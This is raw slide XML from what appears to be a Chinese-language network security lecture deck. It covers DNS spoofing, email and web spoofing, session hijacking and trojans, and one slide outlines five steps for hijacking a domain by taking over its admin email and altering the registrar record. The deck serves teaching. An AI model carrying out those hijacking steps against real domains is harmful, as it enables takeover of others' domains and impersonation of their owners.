              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗、区域传输</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>邮件安全威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假冒他人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址发送信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗，假冒他人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用层安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1800968972"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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364857B9-7B62-4F81-9C37-48265A6B9EB4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗（域名劫持）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2895600"/>
            <a:ext cx="657225" cy="379413"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79877" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="2938463"/>
            <a:ext cx="1871663"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78" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3104201" y="2276475"/>
            <a:ext cx="2297425" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79879" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5246688" y="2894013"/>
            <a:ext cx="1763712" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79880" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3321050" y="3201988"/>
            <a:ext cx="18002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1" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3062288" y="3230563"/>
            <a:ext cx="24574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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a: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地址是199.6.6.9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17418" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4872038" y="4452938"/>
            <a:ext cx="1925637" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>hack.haha.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17419" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5454650" y="4105275"/>
            <a:ext cx="644525" cy="3667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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79884" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="3429000"/>
            <a:ext cx="0" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79885" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="4652963"/>
            <a:ext cx="24479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6" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2692400" y="4221163"/>
            <a:ext cx="1187450" cy="369887"/>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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225298" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214313" y="2857500"/>
            <a:ext cx="1843087" cy="6461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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回假</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225300" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928813" y="4714875"/>
            <a:ext cx="27495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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="1857375"/>
            <a:ext cx="2143125" cy="369888"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>假冒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>（攻击者）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2357438" y="2214563"/>
            <a:ext cx="142875" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851025" y="2286000"/>
            <a:ext cx="149225" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40974869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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="174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additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17419"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36"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animBg="1"/>
      <p:bldP spid="17419" grpId="0"/>
      <p:bldP spid="225298" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="225300" grpId="0" autoUpdateAnimBg="0"/>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威胁与攻击分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60421" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>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EDBEAF26-32C9-4009-A4A2-112F9911A638}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3410972924"/>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normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协作攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>范围内攻击者合作参与攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>合法用户得到鉴别可以访问（建立会话）后，攻击者接管该现存动态会话进行活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模仿或采取不是自己身份的行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转播：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过第三方的机器转播或反射他的通信，造成攻击来自第三方的假象。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如以别人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发起广播请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特洛伊木马或病毒：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大范围感染破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特洛伊木马潜伏藏匿起来偷偷活动，窃取信息，安装后门等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91140" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91138" name="灯片编号占位符 1"/>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340700AE-4A15-4A5E-B0DD-36E0E9C35B26}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27472111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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获得要劫持的域名注册信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络解决方案公司：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>www.networksolutions.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控制该管理域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E-MAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>帐号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改该域名在网络解决方案公司的注册信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冒充拥有者使用管理域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E-MAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>帐号收发网络解决方案公司确认函</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在新指定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器加进该域名记录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗（域名劫持）步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
